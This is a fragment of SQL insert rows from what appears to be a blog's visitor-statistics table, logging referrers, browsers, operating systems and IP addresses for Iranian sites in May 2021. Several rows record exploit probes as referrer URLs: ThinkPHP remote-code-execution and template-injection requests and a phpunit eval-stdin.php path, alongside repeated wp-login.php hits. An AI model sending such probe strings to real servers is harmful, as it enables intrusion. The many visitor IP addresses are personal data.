(11240,'2021-05-01','https://www.google.com/search?','Internet Explorer','Windows','6.1',NULL,NULL,'','204.12.237.149','000',0,1,0),
(11241,'2021-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.208.69','000',0,1,0),
(11242,'2021-05-01','https://www.google.com/','Chrome','Android','9',NULL,NULL,'','178.138.96.24','000',0,1,0),
(11243,'2021-05-01','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','85.251.169.20','000',0,1,0),
(11244,'2021-05-01','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','68.183.32.218','000',0,1,0),
(11245,'2021-05-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.84','000',0,2,0),
(11247,'2021-05-01','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','189.4.75.185','000',0,2,0),
(11248,'2021-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11249,'2021-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11250,'2021-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11251,'2021-05-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11252,'2021-05-01','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.138','000',0,1,0),
(11253,'2021-05-01','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','149.28.132.240','000',0,1,0),
(11254,'2021-05-01','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','217.12.221.2','000',0,1,0),
(11255,'2021-05-01','https://www.google.com/','Samsung Internet','Android','11',NULL,NULL,'','82.61.78.151','000',0,1,0),
(11256,'2021-05-01','https://www.google.com/','Chrome','iOS','14.5',NULL,NULL,'','200.68.138.38','000',0,1,0),
(11257,'2021-05-01','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(11258,'2021-05-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.146','000',0,1,0),
(11259,'2021-05-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.59','000',0,1,0),
(11260,'2021-05-02','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.170.70.122','000',0,1,0),
(11261,'2021-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,2,0),
(11262,'2021-05-02','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','189.4.75.185','000',0,1,0),
(11263,'2021-05-02','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','195.154.185.157','000',0,2,0),
(11264,'2021-05-02','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.16','000',0,1,0),
(11265,'2021-05-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(11266,'2021-05-02','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','171.4.229.197','000',0,2,0),
(11267,'2021-05-02','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','123.17.33.132','000',0,2,0),
(11268,'2021-05-02','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(11269,'2021-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.87.231','000',0,1,0),
(11270,'2021-05-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.84','000',0,3,0),
(11271,'2021-05-02','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.224.107.114','000',0,1,0),
(11272,'2021-05-02','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.214.25.12','000',0,1,0),
(11273,'2021-05-02','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','199.187.126.42','000',0,1,0),
(11274,'2021-05-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','85.203.15.48','000',0,1,0),
(11275,'2021-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.31.106','000',0,1,0),
(11276,'2021-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11277,'2021-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,2,0),
(11278,'2021-05-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11279,'2021-05-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.38.226','000',0,1,0),
(11280,'2021-05-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.232.159.35','000',0,1,0),
(11281,'2021-05-02','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','124.43.12.63','000',0,2,0),
(11282,'2021-05-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(11283,'2021-05-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','199.187.126.46','000',0,2,0),
(11284,'2021-05-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','198.251.78.135','000',0,1,0),
(11285,'2021-05-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(11286,'2021-05-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,1,0),
(11287,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,1,0),
(11288,'2021-05-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.84','000',0,3,0),
(11289,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,1,0),
(11290,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.119.16','000',0,1,0),
(11291,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','112.35.79.100','000',0,1,0),
(11292,'2021-05-03','http://82.102.9.14/index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50','Minimo','Windows CE','5.1',NULL,NULL,'','36.133.37.6','000',0,1,0),
(11293,'2021-05-03','http://82.102.9.14/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','Arora','Windows','6.0',NULL,NULL,'','36.133.37.5','000',0,1,0),
(11294,'2021-05-03','http://82.102.9.14/index.php?s=/module/action/param1/$%7B@die(md5(HelloThinkPHP))%7D','Firefox','OS X','Unknown',NULL,NULL,'','36.133.37.3','000',0,2,0),
(11295,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','8.20.126.154','000',0,2,0),
(11296,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.92.206.251','000',0,2,0),
(11297,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.214','000',0,1,0),
(11298,'2021-05-03','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.136','000',0,1,0),
(11299,'2021-05-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.77.162','000',0,1,0),
(11300,'2021-05-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11301,'2021-05-03','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','109.252.111.157','000',0,1,0),
(11302,'2021-05-03','http://ictbank.ir/blog','Firefox','OS X','Unknown',NULL,NULL,'','192.36.172.86','000',0,1,0),
(11303,'2021-05-03','http://ictbank.ir/blog','Unknown','Windows','6.2',NULL,NULL,'','43.255.39.51','000',0,1,0),
(11304,'2021-05-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','81.69.218.137','000',0,3,0),
(11305,'2021-05-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(11306,'2021-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(11307,'2021-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11308,'2021-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11309,'2021-05-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11310,'2021-05-03','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','88.6.19.50','000',0,2,0),
(11311,'2021-05-03','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(11312,'2021-05-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.12.107.10','000',0,1,0),
(11313,'2021-05-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,6,0),
(11314,'2021-05-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11315,'2021-05-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.142.255.4','000',0,33,0),
(11316,'2021-05-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.221.206.247','000',0,6,0),
(11317,'2021-05-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','135.181.21.126','000',0,1,0),
(11318,'2021-05-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','13.124.222.242','000',0,6,0),
(11319,'2021-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.204.240','000',0,1,0),
(11320,'2021-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.232.126.230','000',0,1,0),
(11321,'2021-05-04','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','31.10.157.200','000',0,1,0),
(11322,'2021-05-04','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','179.127.237.141','000',0,1,0),
(11323,'2021-05-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(11324,'2021-05-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.90.89','000',0,1,0),
(11325,'2021-05-04','http://ictbank.ir/blog','Chrome','OS X','10.9.0',NULL,NULL,'','35.181.87.238','000',0,6,0),
(11326,'2021-05-04','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','18.184.155.204','000',0,6,0),
(11327,'2021-05-04','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','58.186.217.199','000',0,2,0),
(11328,'2021-05-04','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','110.172.131.29','000',0,2,0),
(11329,'2021-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11330,'2021-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(11331,'2021-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11332,'2021-05-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11333,'2021-05-04','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(11334,'2021-05-05','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.131.212.171','000',0,2,0),
(11335,'2021-05-05','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','124.66.189.196','000',0,3,0),
(11336,'2021-05-05','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11337,'2021-05-05','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','98.169.117.45','000',0,1,0),
(11338,'2021-05-05','http://82.102.9.14:80/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,2,0),
(11339,'2021-05-05','https://www.google.com/','Chrome','Android','8.1.0',NULL,NULL,'','45.139.191.156','000',0,2,0),
(11340,'2021-05-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.12.231','000',0,1,0),
(11341,'2021-05-05','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','165.225.216.239','000',0,1,0),
(11342,'2021-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.98.173','000',0,1,0),
(11343,'2021-05-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11344,'2021-05-05','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','92.204.174.134','000',0,2,0),
(11345,'2021-05-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11346,'2021-05-05','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','5.112.191.48','000',0,17,0),
(11347,'2021-05-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.140.131','000',0,1,0),
(11348,'2021-05-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','85.203.44.152','000',0,1,0),
(11349,'2021-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(11350,'2021-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11351,'2021-05-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11352,'2021-05-05','http://ictbank.ir/blog','Safari','iOS','14.4.2',NULL,NULL,'','2.58.44.204','000',0,1,0),
(11353,'2021-05-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.101.12','000',0,1,0),
(11354,'2021-05-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.38.83.105','000',0,1,0),
(11355,'2021-05-05','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','92.45.192.73','000',0,2,0),
(11356,'2021-05-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','42.6.110.3','000',0,3,0),
(11357,'2021-05-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(11358,'2021-05-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,6,0),
(11359,'2021-05-06','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','49.48.150.1','000',0,2,0),
(11360,'2021-05-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','128.134.17.70','000',0,3,0),
(11361,'2021-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.213.155.161','000',0,3,0),
(11362,'2021-05-06','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','202.229.148.14','000',0,1,0),
(11363,'2021-05-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.239.118.250','000',0,1,0),
(11364,'2021-05-06','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','212.129.152.41','000',0,1,0),
(11365,'2021-05-06','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.248','000',0,1,0),
(11366,'2021-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.145.230','000',0,1,0),
(11367,'2021-05-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','91.92.185.70','000',0,3,0),
(11368,'2021-05-06','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','86.104.106.211','000',0,1,0),
(11369,'2021-05-06','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','79.127.96.129','000',0,1,0),
(11370,'2021-05-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,1,0),
(11371,'2021-05-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.133.209','000',0,1,0),
(11372,'2021-05-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(11373,'2021-05-06','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','114.141.52.243','000',0,2,0),
(11374,'2021-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(11375,'2021-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11376,'2021-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11377,'2021-05-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11378,'2021-05-06','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','213.188.53.181','000',0,1,0),
(11379,'2021-05-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(11380,'2021-05-07','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','160.178.129.176','000',0,2,0),
(11381,'2021-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(11382,'2021-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,1,0),
(11383,'2021-05-07','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','54.39.29.64','000',0,6,0),
(11384,'2021-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.98.80.28','000',0,3,0),
(11385,'2021-05-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11386,'2021-05-07','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','107.189.1.220','000',0,1,0),
(11387,'2021-05-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11388,'2021-05-07','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','13.58.56.77','000',0,6,0),
(11389,'2021-05-07','https://google.com','Chrome','Linux','Unknown',NULL,NULL,'','89.248.168.108','000',0,2,0),
(11390,'2021-05-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','18.231.94.162','000',0,6,0),
(11391,'2021-05-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,2,0),
(11392,'2021-05-07','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','198.199.72.91','000',0,2,0),
(11393,'2021-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.247.120','000',0,1,0),
(11394,'2021-05-07','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','86.49.239.134','000',0,1,0),
(11395,'2021-05-07','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','96.126.110.131','000',0,1,0),
(11396,'2021-05-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11397,'2021-05-07','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','93.158.91.183','000',0,1,0),
(11398,'2021-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(11399,'2021-05-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.251.241.226','000',0,6,0),
(11400,'2021-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.126.84','000',0,1,0),
(11401,'2021-05-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','181.115.204.74','000',0,3,0),
(11402,'2021-05-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.178.182.46','000',0,6,0),
(11403,'2021-05-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(11404,'2021-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(11405,'2021-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11406,'2021-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11407,'2021-05-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11408,'2021-05-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.72.48.130','000',0,2,0),
(11409,'2021-05-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.173.209.108','000',0,7,0),
(11410,'2021-05-07','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','119.158.114.240','000',0,2,0),
(11411,'2021-05-07','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','62.121.66.49','000',0,2,0),
(11412,'2021-05-07','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,2,0),
(11413,'2021-05-08','http://design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','42.192.184.76','000',0,1,0),
(11414,'2021-05-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','174.138.18.208','000',0,1,0),
(11415,'2021-05-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.38.83.105','000',0,1,0),
(11416,'2021-05-08','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11417,'2021-05-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','43.245.222.163','000',0,1,0),
(11418,'2021-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,1,0),
(11419,'2021-05-08','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(11420,'2021-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.210.111','000',0,1,0),
(11421,'2021-05-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,3,0),
(11422,'2021-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,1,0),
(11423,'2021-05-08','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','42.118.218.220','000',0,2,0),
(11424,'2021-05-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.245.64','000',0,1,0),
(11425,'2021-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(11426,'2021-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','54.39.29.64','000',0,6,0),
(11427,'2021-05-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11428,'2021-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11429,'2021-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(11430,'2021-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11431,'2021-05-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11432,'2021-05-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(11433,'2021-05-08','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','41.142.140.117','000',0,2,0),
(11434,'2021-05-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(11435,'2021-05-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(11436,'2021-05-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.181','000',0,6,0),
(11437,'2021-05-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(11438,'2021-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.252.151.194','000',0,2,0),
(11439,'2021-05-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(11440,'2021-05-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,4,0),
(11441,'2021-05-09','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','107.189.1.220','000',0,1,0),
(11442,'2021-05-09','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','115.134.67.105','000',0,2,0),
(11443,'2021-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.119.91','000',0,1,0),
(11444,'2021-05-09','http://ictbank.ir/blog','Chrome','Android','11',NULL,NULL,'','185.220.70.196','000',0,1,0),
(11445,'2021-05-09','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','93.206.214.207','000',0,1,0),
(11446,'2021-05-09','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.17.138.110','000',0,1,0),
(11447,'2021-05-09','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.85.237.163','000',0,3,0),
(11448,'2021-05-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.115.226','000',0,1,0),
(11449,'2021-05-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','108.62.124.232','000',0,2,0),
(11450,'2021-05-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,1,0),
(11451,'2021-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11452,'2021-05-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,3,0),
(11453,'2021-05-09','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','180.241.194.144','000',0,2,0),
(11454,'2021-05-09','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','121.4.181.178','000',0,1,0),
(11455,'2021-05-09','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','212.129.152.41','000',0,1,0),
(11456,'2021-05-10','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','125.164.140.13','000',0,2,0),
(11457,'2021-05-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(11458,'2021-05-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.108.118.7','000',0,1,0),
(11459,'2021-05-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,3,0),
(11460,'2021-05-10','http://mail.design-arena.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','113.161.58.60','000',0,2,0),
(11461,'2021-05-10','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','1.14.17.89','000',0,1,0),
